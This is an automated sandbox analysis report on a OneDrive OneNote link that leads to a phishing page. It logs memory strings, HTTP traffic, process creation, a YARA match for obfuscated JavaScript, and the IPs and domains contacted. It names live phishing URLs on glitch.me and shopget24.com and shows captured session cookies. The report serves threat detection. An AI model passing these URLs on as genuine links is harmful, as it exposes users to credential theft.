Source: Current Session.0.dr String found in binary or memory: https://onedrive.live.comh
Source: Current Session.0.dr String found in binary or memory: https://onenote.officeapps.live.com
Source: QuotaManager.0.dr, index.txt.tmp.0.dr String found in binary or memory: https://onenote.officeapps.live.com/
Source: data_1.2.dr String found in binary or memory: https://onenote.officeapps.live.com/o/AddinServiceHandler.ashx?action=laststoreupdate&app=4&lc=EN-US
Source: data_1.2.dr String found in binary or memory: https://onenote.officeapps.live.com/o/AppSettingsHandler.ashx?app=OneNote&usid=b3662fcd-8cee-4569-8a
Source: data_1.2.dr String found in binary or memory: https://onenote.officeapps.live.com/o/App_Scripts/Acl/Acl1033.js
Source: data_1.2.dr String found in binary or memory: https://onenote.officeapps.live.com/o/GetImage.ashx?&WOPIsrc=https%3A%2F%2Fwopi%2Eonedrive%2Ecom%2Fw
Source: Current Session.0.dr String found in binary or memory: https://onenote.officeapps.live.com/o/onenoteframe.aspx?edit=0&ui=en-US&rs=en-US&hid=h7R3p7Jmb0qNr90
Source: data_3.2.dr String found in binary or memory: https://onenote.officeapps.live.comAccess-Control-Allow-Headers:
Source: data_3.2.dr String found in binary or memory: https://onenote.officeapps.live.comAccess-Control-Allow-Methods:
Source: data_1.2.dr String found in binary or memory: https://p.sfx.ms//storage/aria-2.5.0.min.js
Source: data_1.2.dr String found in binary or memory: https://p.sfx.ms/is/invis.gif
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: data_3.2.dr String found in binary or memory: https://pki.goog/repository/0
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://preprod-hangouts-googleapis.sandbox.google.com
Source: f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://r4---sn-4g5e6ns7.gvt1.com
Source: data_3.2.dr, data_1.2.dr String found in binary or memory: https://r4---sn-4g5e6ns7.gvt1.com/edgedl/chrome/dict/en-us-9-0.bdic?cms_redirect=yes&mh=I2&mip=102.1
Source: f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://redirector.gvt1.com
Source: data_1.2.dr String found in binary or memory: https://redirector.gvt1.com/edgedl/chrome/dict/en-us-9-0.bdic
Source: craw_window.js.0.dr, manifest.json.0.dr String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: data_1.2.dr String found in binary or memory: https://shopget24.com/images/sampledata/hack-run.png
Source: data_1.2.dr String found in binary or memory: https://shopget24.com/images/sampledata/hack-run.pngp
Source: data_1.2.dr String found in binary or memory: https://shopget24.com/images/sampledata/hack-run.pngx-turbo-charged-by:
Source: Current Session.0.dr, data_1.2.dr String found in binary or memory: https://skyapi.onedrive.live.com/api/proxy?v=3
Source: f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://spoprod-a.akamaihd.net
Source: data_1.2.dr String found in binary or memory: https://spoprod-a.akamaihd.net/files/fabric/assets/icons/fabricmdl2icons.woff
Source: data_1.2.dr String found in binary or memory: https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001//filesbucket3
Source: data_1.2.dr String found in binary or memory: https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001//filescss1-11
Source: data_1.2.dr String found in binary or memory: https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001//filescss2-78
Source: data_1.2.dr String found in binary or memory: https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001//maincss-3d63
Source: data_1.2.dr String found in binary or memory: https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001/jquery-1.7.2-
Source: data_1.2.dr String found in binary or memory: https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001/wac0-efa56458
Source: data_1.2.dr String found in binary or memory: https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001/wac1-cdc297b4
Source: data_1.2.dr String found in binary or memory: https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001/wac2-bf8b3319
Source: data_1.2.dr String found in binary or memory: https://spoprod-a.akamaihd.net/files/onedrive-website-release-prod_master_20210924.001/wac_s_office-
Source: 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://ssl.gstatic.com
Source: data_1.2.dr String found in binary or memory: https://storage.live.com/mydata/myprofile/expressionprofile/profilephoto:UserTileStatic
Source: messages.json41.0.dr, messages.json15.0.dr, messages.json5.0.dr, messages.json29.0.dr, feedback.html.0.dr, messages.json23.0.dr, messages.json71.0.dr, messages.json73.0.dr, messages.json59.0.dr, messages.json27.0.dr, messages.json83.0.dr, messages.json79.0.dr, messages.json25.0.dr, messages.json82.0.dr, messages.json44.0.dr, messages.json46.0.dr, messages.json70.0.dr, messages.json0.0.dr, messages.json85.0.dr, messages.json88.0.dr, messages.json14.0.dr String found in binary or memory: https://support.google.com/chromecast/answer/2998456
Source: messages.json41.0.dr, messages.json15.0.dr, messages.json5.0.dr, messages.json29.0.dr, feedback.html.0.dr, messages.json23.0.dr, messages.json71.0.dr, messages.json73.0.dr, messages.json59.0.dr, messages.json27.0.dr, messages.json83.0.dr, messages.json79.0.dr, messages.json25.0.dr, messages.json82.0.dr, messages.json44.0.dr, messages.json46.0.dr, messages.json70.0.dr, messages.json0.0.dr, messages.json85.0.dr, messages.json88.0.dr, messages.json14.0.dr String found in binary or memory: https://support.google.com/chromecast/troubleshooter/2995236
Source: craw_window.js.0.dr, craw_background.js.0.dr String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: data_3.2.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, manifest.json0.0.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://www.google.com
Source: manifest.json.0.dr String found in binary or memory: https://www.google.com/
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.0.dr String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.0.dr String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: mirroring_hangouts.js.0.dr String found in binary or memory: https://www.google.com/log?format=json&hasfast=true
Source: manifest.json0.0.dr String found in binary or memory: https://www.google.com;
Source: craw_window.js.0.dr, craw_background.js.0.dr, 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://www.googleapis.com
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/
Source: manifest.json0.0.dr String found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: manifest.json0.0.dr String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json0.0.dr String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: manifest.json0.0.dr String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: manifest.json0.0.dr String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: manifest.json0.0.dr String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: manifest.json0.0.dr String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json.0.dr String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: manifest.json0.0.dr String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: 5173a041-abc9-496c-9de9-8d9fece84bb7.tmp.2.dr, f3469627-cdf8-4b49-87a4-91b8da1b0944.tmp.2.dr, 9f8fd026-4c5d-49d2-8bb9-aa76b918a01a.tmp.2.dr String found in binary or memory: https://www.gstatic.com
Source: manifest.json0.0.dr String found in binary or memory: https://www.gstatic.com;
Source: data_3.2.dr String found in binary or memory: https://www.onenote.com
Source: 000003.log5.0.dr String found in binary or memory: https://www.onenote.com/
Source: Current Session.0.dr, data_1.2.dr String found in binary or memory: https://www.onenote.com/officeaddins/learningtools/?et=
Source: data_1.2.dr String found in binary or memory: https://www.onenote.com/officeaddins/learningtools/?et=pxY
Source: unknown HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknown DNS traffic detected: queries for: accounts.google.com
Source: global traffic HTTP traffic detected: GET /o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9 HTTP/1.1Host: 1drv.msConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /crx/blobs/Acy1k0bLIjHsvnKaKN_oRpVaYYvFs25d7GKYF1WXrT6yizCMksBO0c_ggE0B6tx6HPRHe6q1GOEe3_NcIbSiGG8kXeLMUY0sAKVvC6R89zvKM13s5VqoAMZSmuUgjQL5vlygJuArQghXXE_qTL7NlQ/extension_8520_615_0_5.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /api/proxy?v=3 HTTP/1.1Host: skyapi.onedrive.live.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://onedrive.live.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: xid=dbfd2c72-fe4c-40c9-9f16-9295c1417bc0&&RD0003FF9C195C&60; wla42=; mkt=en-US; xidseq=3; E=P:W5MLqHri2Yg=:XZwRAMVv+FBam385/rnbcor4xrRNRRQzBG/GSlyXjZE=:F
Source: global traffic HTTP traffic detected: GET /mydata/myprofile/expressionprofile/profilephoto:UserTileStatic,UserTileSmall/MeControlMediumUserTile?ck=1&ex=24&fofoff=1&sc=1643419484127 HTTP/1.1Host: storage.live.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onenote.officeapps.live.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: xid=dbfd2c72-fe4c-40c9-9f16-9295c1417bc0&&RD0003FF9C195C&60; wla42=; mkt=en-US; xidseq=3; E=P:W5MLqHri2Yg=:XZwRAMVv+FBam385/rnbcor4xrRNRRQzBG/GSlyXjZE=:F; BP=l=SDX.Skydrive&FR=&ST=; MUID=3D609D24E268600A10D48C1EE668644C
Source: global traffic HTTP traffic detected: GET /freedo.html HTTP/1.1Host: magenta-flicker-surprise.glitch.meConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /css/hover.css HTTP/1.1Host: magenta-flicker-surprise.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://magenta-flicker-surprise.glitch.me/freedo.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://magenta-flicker-surprise.glitch.meUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://magenta-flicker-surprise.glitch.me/freedo.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /gmail.com HTTP/1.1Host: logo.clearbit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://magenta-flicker-surprise.glitch.me/freedo.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://magenta-flicker-surprise.glitch.meUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://magenta-flicker-surprise.glitch.me/freedo.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://magenta-flicker-surprise.glitch.meUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://magenta-flicker-surprise.glitch.me/freedo.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /css/hover.css HTTP/1.1Host: magenta-flicker-surprise.glitch.meConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://magenta-flicker-surprise.glitch.me/freedo.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/sampledata/hack-run.png HTTP/1.1Host: shopget24.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /83cffd1ebf23ed93aa925eb9529f5348.png HTTP/1.1Host: i.gyazo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://magenta-flicker-surprise.glitch.me/freedo.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /83cffd1ebf23ed93aa925eb9529f5348.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: i.gyazo.com
Source: global traffic HTTP traffic detected: GET /images/sampledata/hack-run.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: shopget24.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/sampledata/hack-run.png HTTP/1.1Host: shopget24.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /images/sampledata/hack-run.png HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36Host: shopget24.com
Source: unknown HTTPS traffic detected: 104.19.143.111:443 -> 192.168.2.6:49976 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.219.248.46:443 -> 192.168.2.6:49979 version: TLS 1.2

System Summary
barindex
Yara signature match
Source: 13645.4.pages.csv, type: HTML Matched rule: SUSP_obfuscated_JS_obfuscatorio date = 2021-08-25, author = @imp0rtp3, description = Detect JS obfuscation done by the js obfuscator (often malicious), reference = https://obfuscator.io, score =
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "https://1drv.ms/o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,188383026965401033,7131490049536642209,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1780 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1660,188383026965401033,7131490049536642209,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1780 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Program Files\Google\Chrome\Application\Dictionaries Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-61F49744-171C.pma Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\8948aa28-1d9e-404e-9621-12e03e91044a.tmp Jump to behavior
Source: classification engine Classification label: mal72.phis.win@34/259@27/15
Source: QuotaManager.0.dr Binary or memory string: CREATE TABLE HostQuotaTable(host TEXT NOT NULL, type INTEGER NOT NULL, quota INTEGER DEFAULT 0, UNIQUE(host, type));
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdic Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562252 URL: https://1drv.ms/o/s!BHKIhV1... Startdate: 28/01/2022 Architecture: WINDOWS Score: 72 20 shopget24.com 2->20 22 p.sfx.ms 2->22 24 3 other IPs or domains 2->24 36 Antivirus detection for URL or domain 2->36 38 Phishing site detected (based on favicon image match) 2->38 40 Yara detected HtmlPhish10 2->40 42 2 other signatures 2->42 7 chrome.exe 15 443 2->7         started        signatures3 process4 dnsIp5 26 192.168.2.1 unknown unknown 7->26 28 239.255.255.250 unknown Reserved 7->28 14 C:\...\pnacl_public_x86_64_pnacl_sz_nexe, ELF 7->14 dropped 16 C:\...\pnacl_public_x86_64_pnacl_llc_nexe, ELF 7->16 dropped 18 C:\Users\user\...\pnacl_public_x86_64_ld_nexe, ELF 7->18 dropped 11 chrome.exe 85 7->11         started        file6 process7 dnsIp8 30 shopget24.com 104.219.248.46, 443, 49964, 49967 NAMECHEAP-NETUS United States 11->30 32 i-am3p-cor006.api.p001.1drv.com 13.104.158.180, 443, 49913 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 11->32 34 33 other IPs or domains 11->34
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.19.143.111
 i.gyazo.com United States
13335 CLOUDFLARENETUS false
13.104.158.180
 i-am3p-cor006.api.p001.1drv.com United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
104.219.248.46
 shopget24.com United States
22612 NAMECHEAP-NETUS false
104.16.18.94
 cdnjs.cloudflare.com United States
13335 CLOUDFLARENETUS false
142.250.203.109
 accounts.google.com United States
15169 GOOGLEUS false
40.90.142.226
 i-am3p-cor002.api.p001.1drv.com United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
216.58.215.227
 gstaticadssl.l.google.com United States
15169 GOOGLEUS false
104.18.11.207
 maxcdn.bootstrapcdn.com United States
13335 CLOUDFLARENETUS false
13.107.42.12
 1drv.ms United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
18.209.2.231
 magenta-flicker-surprise.glitch.me United States
14618 AMAZON-AESUS false
239.255.255.250
 unknown Reserved
unknown unknown false
172.217.168.33
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
65.9.61.53
 d26p066pn2w0s0.cloudfront.net United States
16509 AMAZON-02US false

Private

IP
192.168.2.1
127.0.0.1

Contacted Domains

Name IP Active
gstaticadssl.l.google.com 216.58.215.227 true
accounts.google.com 142.250.203.109 true
i.gyazo.com 104.19.143.111 true
maxcdn.bootstrapcdn.com 104.18.11.207 true
magenta-flicker-surprise.glitch.me 18.209.2.231 true
i-am3p-cor002.api.p001.1drv.com 40.90.142.226 true
1drv.ms 13.107.42.12 true
d26p066pn2w0s0.cloudfront.net 65.9.61.53 true
i-am3p-cor006.api.p001.1drv.com 13.104.158.180 true
cdnjs.cloudflare.com 104.16.18.94 true
clients.l.google.com 142.250.203.110 true
shopget24.com 104.219.248.46 true
googlehosted.l.googleusercontent.com 172.217.168.33 true
onenoteonlinesync.onenote.com unknown unknown
messaging.office.com unknown unknown
c.live.com unknown unknown
ajax.aspnetcdn.com unknown unknown
storage.live.com unknown unknown
skyapi.onedrive.live.com unknown unknown
clients2.googleusercontent.com unknown unknown
clients2.google.com unknown unknown
code.jquery.com unknown unknown
onedrive.live.com unknown unknown
p.sfx.ms unknown unknown
amcdn.msftauth.net unknown unknown
spoprod-a.akamaihd.net unknown unknown
www.onenote.com unknown unknown
logo.clearbit.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://i.gyazo.com/83cffd1ebf23ed93aa925eb9529f5348.png false
    		high
    https://magenta-flicker-surprise.glitch.me/freedo.html false
    • SlashNext: Fake Login Page type: Phishing & Social usering
    		 high
    https://magenta-flicker-surprise.glitch.me/css/hover.css false
      		high
      https://shopget24.com/images/sampledata/hack-run.png false
      • 3%, Virustotal, Browse
      • Avira URL Cloud: phishing
      		 unknown
      https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js false
        		high
        https://onedrive.live.com/view.aspx?resid=5890075B5D858872!361&ithint=onenote&authkey=!AjRjdqYSIWOk6SY false
          		high
          https://magenta-flicker-surprise.glitch.me/freedo.html false
